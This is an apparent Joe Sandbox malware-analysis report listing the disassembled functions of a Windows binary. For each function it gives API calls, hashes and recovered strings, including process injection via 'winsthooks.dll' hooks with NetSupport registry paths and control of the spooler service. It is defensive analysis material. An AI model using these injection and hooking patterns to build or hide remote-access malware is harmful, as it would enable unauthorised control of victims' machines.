                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: cda80ff764fee0188e4a7d25246201dd9174f6beb232e517e720bc0c3ea555d8
                                                                                          • Instruction ID: 0ab8ac5319609299ab01e5d30a6952c05e5c97bf5c09a75aaf910084ccea4b18
                                                                                          • Opcode Fuzzy Hash: cda80ff764fee0188e4a7d25246201dd9174f6beb232e517e720bc0c3ea555d8
                                                                                          • Instruction Fuzzy Hash: F021D4325406079FEB34DF2ACC6AAABBBEAEF40358B20452EE455C3190DB74E945CA50
                                                                                          Function 00602839 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoA.KERNEL32(00000000,?,?,00000078), ref: 0060287C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: cad8c24dd3d98c2274cd4f298c129f36304c0821d8c1d6cf556dc4091b99f86d
                                                                                          • Instruction ID: 9b2736dcbd23737cd1d588db5cb77b9833005f5f9304949b1f1d14a111016ceb
                                                                                          • Opcode Fuzzy Hash: cad8c24dd3d98c2274cd4f298c129f36304c0821d8c1d6cf556dc4091b99f86d
                                                                                          • Instruction Fuzzy Hash: 8A11E576A40B065FD724DB39C84ABFBB7EEEF91710F24442EE456C7290DB74E8058612
                                                                                          Function 006028E0 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 00602901
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: d8c59c47c64489b67837c041a9eac2172cceb349479eeb1e8039316edda37999
                                                                                          • Instruction ID: 0b9d95630d6283a2dd57369d0cc727e6eb6eb51d64002164b6395ff849ad530a
                                                                                          • Opcode Fuzzy Hash: d8c59c47c64489b67837c041a9eac2172cceb349479eeb1e8039316edda37999
                                                                                          • Instruction Fuzzy Hash: 66F0B43365011A7FDB14966ACC5DBDB73AEEF89754F154031F855E3280E970EE418290
                                                                                          Function 005DD040 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fc1e2e860cd465fdd7ba155f24f0339d4d0b0d83799a65684db680c2679b4180
                                                                                          • Instruction ID: b256ca1552c4d0bc2311a7a76a889f4b0389daa16ee6ef0015567ff9574ba891
                                                                                          • Opcode Fuzzy Hash: fc1e2e860cd465fdd7ba155f24f0339d4d0b0d83799a65684db680c2679b4180
                                                                                          • Instruction Fuzzy Hash: 35F0E278B8020266FF30636C6C0AB781D22B794715F8C0473FA169A7D2FA89994A9167
                                                                                          Function 00602BF8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnumSystemLocalesA.KERNEL32(0060293B,00000001,00602D3C,00000001,00000000,00000000), ref: 00602C3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2099609381-0
                                                                                          • Opcode ID: d3c5239519ee78f9425279397084dbf07ab9e22e21721ad792dafe19b4e3c4bb
                                                                                          • Instruction ID: dd332adf05fcfbda4fd0d98e05ab1d98072e0422a2179bbf63c2def8092a3fda
                                                                                          • Opcode Fuzzy Hash: d3c5239519ee78f9425279397084dbf07ab9e22e21721ad792dafe19b4e3c4bb
                                                                                          • Instruction Fuzzy Hash: 48F087705907078AE7389F36C51DB96B7F2AF04700F509E28E0A6D25D1C778E489CA00
                                                                                          Function 00602C5F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnumSystemLocalesA.KERNEL32(00602B0C,00000001,00602D0C,00000083,00000000,000000BC,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602C8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2099609381-0
                                                                                          • Opcode ID: f7f48496f2a043c18e66680f4d04af14a3e92e82625fc59fb49df393192a30fd
                                                                                          • Instruction ID: f8c3d66e2e314db32332dcdcb20d3f9e793d8fb5a7869a9601ab225c3cc424dd
                                                                                          • Opcode Fuzzy Hash: f7f48496f2a043c18e66680f4d04af14a3e92e82625fc59fb49df393192a30fd
                                                                                          • Instruction Fuzzy Hash: E3E0DF706D03039AE7289F30C81DB16BBE2AF00B05F20CE2DE0A2C50D1C3B58444CA00
                                                                                          Function 00602BCE Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnumSystemLocalesA.KERNEL32(Function_00072839,00000001), ref: 00602BE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2099609381-0
                                                                                          • Opcode ID: 7ddf325f8f6a59c7f5503a68110f4331618d3d36311e2dcce329d01fe9b5a283
                                                                                          • Instruction ID: 650e038faf929661fe94038ac97762a6244cdc8d916d05138c1280b2bb3b79df
                                                                                          • Opcode Fuzzy Hash: 7ddf325f8f6a59c7f5503a68110f4331618d3d36311e2dcce329d01fe9b5a283
                                                                                          • Instruction Fuzzy Hash: 52D0A932AC0B024BE3205FB098083A67BE0EF00F09F90CC8ADEA2810D0D7B98889C341
                                                                                          Function 005FA1DA Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0006A198), ref: 005FA1DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 836fa1ed482aba5f045ea5db254078d6012997b041368a611bd9a542f2ae5f64
                                                                                          • Instruction ID: db7d9afc8d52ea2167add8e9ad835b3038803dbb0e5ad2d35b243fb1d612cf20
                                                                                          • Opcode Fuzzy Hash: 836fa1ed482aba5f045ea5db254078d6012997b041368a611bd9a542f2ae5f64
                                                                                          • Instruction Fuzzy Hash: 849022A028000A02C30803300C0E80828822B8CB0AB0200002002C0080CB000000C023
                                                                                          Function 005E04C5 Relevance: 84.4, APIs: 36, Strings: 12, Instructions: 357librarysynchronizationsleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E0547
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005E0560
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E059B
                                                                                          • GetProcAddress.KERNEL32(?,MySetHook), ref: 005E05CB
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005E05F3
                                                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 005E0607
                                                                                          • wsprintfW.USER32 ref: 005E065C
                                                                                          • CreateEventW.KERNEL32(?,00000000,00000000,?), ref: 005E0674
                                                                                          • GetDesktopWindow.USER32 ref: 005E068C
                                                                                          • SendMessageW.USER32(00000000), ref: 005E0693
                                                                                          • Sleep.KERNEL32(0000000F), ref: 005E069B
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599791
                                                                                            • Part of subcall function 00599770: GetWindowLongW.USER32(00000000,000000F0), ref: 005997A4
                                                                                            • Part of subcall function 00599770: DwmGetWindowAttribute.DWMAPI(00000000,0000000E,?,00000004), ref: 005997C2
                                                                                            • Part of subcall function 00599770: FindWindowExW.USER32(00000000,00000000,Windows.UI.Core.CoreWindow,00000000), ref: 00599839
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000F), ref: 005E06C9
                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,NSMViewPaused), ref: 005E0701
                                                                                          • IsWindow.USER32(?), ref: 005E0721
                                                                                          • GetClassNameW.USER32(?,?,00000080), ref: 005E073C
                                                                                          • IsWindowVisible.USER32(?), ref: 005E07BC
                                                                                          • SetEvent.KERNEL32(?), ref: 005E07F8
                                                                                          • IsWindow.USER32(?), ref: 005E0811
                                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0000000F), ref: 005E0851
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8), ref: 005E0993
                                                                                            • Part of subcall function 005E0220: SendInput.USER32(00000002,?,0000001C), ref: 005E0287
                                                                                          • Sleep.KERNEL32(00000032), ref: 005E08B2
                                                                                          • IsWindow.USER32(?), ref: 005E08FE
                                                                                          • WaitForSingleObject.KERNEL32(?,0000000F), ref: 005E091A
                                                                                          • GetProcAddress.KERNEL32(?,MyUnhook), ref: 005E09C5
                                                                                          • GetDesktopWindow.USER32 ref: 005E09EC
                                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 005E0A00
                                                                                          • OpenProcess.KERNEL32(00000600,00000000,?), ref: 005E0A19
                                                                                          • OpenProcess.KERNEL32(00000200,00000000,?), ref: 005E0A2E
                                                                                          • GetPriorityClass.KERNEL32(00000000), ref: 005E0A37
                                                                                          • SetPriorityClass.KERNEL32(00000000,00000080), ref: 005E0A4C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Process$Wait$ClassEventObjectOpenSingle$AddressCreateDesktopFindLibraryLoadNamePriorityProcSendSleepThread$AttributeFileInputLongMessageModuleMultipleObjectsVisiblewsprintf
                                                                                          • String ID: Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$\NSL\$winsthooks.dll
                                                                                          • API String ID: 1121615632-101993463
                                                                                          • Opcode ID: 63435de6d6dd6e564d0237da09ce06f054d407c082c797885b723c400c68b7be
                                                                                          • Instruction ID: 873326df7ef249947912910f2097e38593391b156aa55b27611154f0d083067a
                                                                                          • Opcode Fuzzy Hash: 63435de6d6dd6e564d0237da09ce06f054d407c082c797885b723c400c68b7be
                                                                                          • Instruction Fuzzy Hash: 2AD148B1D007699BDB349B60CC49BEA7B79BF40704F085099E649A71C2EBB09EC4CF65
                                                                                          Function 005D32E0 Relevance: 80.7, APIs: 19, Strings: 27, Instructions: 226servicesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 005D3308
                                                                                          • GetLastError.KERNEL32 ref: 005D333A
                                                                                          • OpenServiceW.ADVAPI32(00000000,spooler,00000034), ref: 005D335C
                                                                                          • GetLastError.KERNEL32 ref: 005D3364
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D338B
                                                                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 005D33D7
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D33F8
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D340F
                                                                                          • QueryServiceStatus.ADVAPI32(00000000,?), ref: 005D341D
                                                                                          • GetLastError.KERNEL32 ref: 005D3455
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D3547
                                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 005D3561
                                                                                          • Sleep.KERNEL32(000001F4), ref: 005D356C
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 005D3595
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$ErrorLastQueryStatus$CloseHandleOpenSleepwsprintf$DirectoryLocalManagerStartSystemTimewvsprintf
                                                                                          • String ID: Attempt to start the service$Attempt to stop the service$ControlService failed with %d$START$STOP$Serivce isn't in Stopped state$Service Manager : %08x - %d$Service State : %d$Service is running$Service is stopped$Service isn't running$Service started ok$Service stopped ok$Servive failed to start after 60 seconds$Servive failed to stop after 60 seconds$StartService failed with %d$StartService ok$Use old method$\net$close service manager$close spooler service$hSpooler %08x - %d$spooler$spooler (%s)$spooler finished$start$stop
                                                                                          • API String ID: 3453032217-1626732039
                                                                                          • Opcode ID: 6d136578e951cff414e9ed327dee9f71317f86578d0b5cb7e208a3b29012f803
                                                                                          • Instruction ID: 5d5402c84260a3a7ea7a39f1085d59d216b2bdd89ceecaeb8707ebdbb5d24b1c
                                                                                          • Opcode Fuzzy Hash: 6d136578e951cff414e9ed327dee9f71317f86578d0b5cb7e208a3b29012f803
                                                                                          • Instruction Fuzzy Hash: AC713970A41216BBDB30AB58BC5EFA93BA5BF55704F0880A7F50792392D6718F418F63
                                                                                          Function 005DA810 Relevance: 72.0, APIs: 40, Strings: 1, Instructions: 273windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendDlgItemMessageW.USER32(?,00000421,0000000E,?,?), ref: 005DA86D
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005DA87E
                                                                                          • EnableWindow.USER32(00000000), ref: 005DA885
                                                                                          • GetDlgItemTextA.USER32(?,00000421,00640F06,00000050), ref: 005DA8C0
                                                                                          • GetDlgItemTextA.USER32(?,00000422,00640EEA,0000000A), ref: 005DA8EB
                                                                                          • GetDlgItemTextA.USER32(?,00000423,00640EF4,00000006), ref: 005DA8FA
                                                                                          • GetDlgItemTextW.USER32(?,00000424,?,00000050), ref: 005DA90B
                                                                                          • LoadStringW.USER32(00590000,00000415,?,00000050), ref: 005DA922
                                                                                          • GetDlgItemTextW.USER32(?,00000425,?,00000050), ref: 005DA95C
                                                                                          • EndDialog.USER32(?,?), ref: 005DA977
                                                                                          • GetDlgItem.USER32(?,0000042E), ref: 005DA9C4
                                                                                          • ShowWindow.USER32(00000000), ref: 005DA9C7
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 005DA9CE
                                                                                          • ShowWindow.USER32(00000000), ref: 005DA9D1
                                                                                          • SendDlgItemMessageW.USER32(?,00000421,000000CF,00000001,00000000), ref: 005DA9E2
                                                                                          • SendDlgItemMessageW.USER32(?,00000422,000000CF,00000001,00000000), ref: 005DA9F7
                                                                                          • SendDlgItemMessageW.USER32(?,00000423,000000CF,00000001,00000000), ref: 005DAA0C
                                                                                          • SendDlgItemMessageW.USER32(?,00000424,000000CF,00000001,00000000), ref: 005DAA21
                                                                                          • GetDlgItem.USER32(?,00000425), ref: 005DAA2F
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAA32
                                                                                          • GetDlgItem.USER32(?,00000431), ref: 005DAA3C
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAA3F
                                                                                          • SendDlgItemMessageW.USER32(?,00000421,000000C5,0000004F,00000000), ref: 005DAA50
                                                                                          • SetDlgItemTextA.USER32(?,00000421,00640F06), ref: 005DAA61
                                                                                          • SetDlgItemTextA.USER32(?,00000422,00640EEA), ref: 005DAA72
                                                                                          • SetDlgItemTextA.USER32(?,00000423,00640EF4), ref: 005DAA83
                                                                                          • wsprintfW.USER32 ref: 005DAAC7
                                                                                          • SetDlgItemTextW.USER32(?,00000424,?), ref: 005DAADD
                                                                                          • GetDlgItem.USER32(?,00000422), ref: 005DAAF4
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAAF7
                                                                                          • GetDlgItem.USER32(?,00000423), ref: 005DAB01
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB04
                                                                                          • GetDlgItem.USER32(?,00000424), ref: 005DAB0E
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB11
                                                                                          • GetDlgItem.USER32(?,00000425), ref: 005DAB1B
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB1E
                                                                                          • GetDlgItem.USER32(?,00000431), ref: 005DAB28
                                                                                          • ShowWindow.USER32(00000000), ref: 005DAB2B
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 005DAB41
                                                                                          • EnableWindow.USER32(00000000), ref: 005DAB44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Item$Window$ShowText$MessageSend$Enable$DialogLoadStringwsprintf
                                                                                          • String ID: %02d-%s-%d
                                                                                          • API String ID: 1251551559-2248033597
                                                                                          • Opcode ID: acbd5c91af52641475cd3a3d3b3b566f154d5873ce0490391bf70256ab4f1b3b
                                                                                          • Instruction ID: 2ed483183353fda121713bd84e39954846f4e5f28ced8da75763f37a648d8cfa
                                                                                          • Opcode Fuzzy Hash: acbd5c91af52641475cd3a3d3b3b566f154d5873ce0490391bf70256ab4f1b3b
                                                                                          • Instruction Fuzzy Hash: 518119B17813287AF731AB649C4AFEF366EEF45B00F048016F701691D1CAF85A45CA7A
                                                                                          Function 005BC980 Relevance: 66.8, APIs: 30, Strings: 8, Instructions: 320libraryloadermemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LocalAlloc.KERNEL32(00000040,00000014,DE64E134), ref: 005BC9C3
                                                                                          • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 005BC9DE
                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 005BCA4C
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCA91
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCA9B
                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 005BCAA7
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCAF0
                                                                                          • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 005BCB00
                                                                                          • LocalFree.KERNEL32(?), ref: 005BCB49
                                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 005BCB58
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCB64
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCB93
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCBA0
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCBAA
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCBC9
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCBF5
                                                                                          • GetProcAddress.KERNEL32(00000000,BuildExplicitAccessWithNameW), ref: 005BCC25
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005BCC54
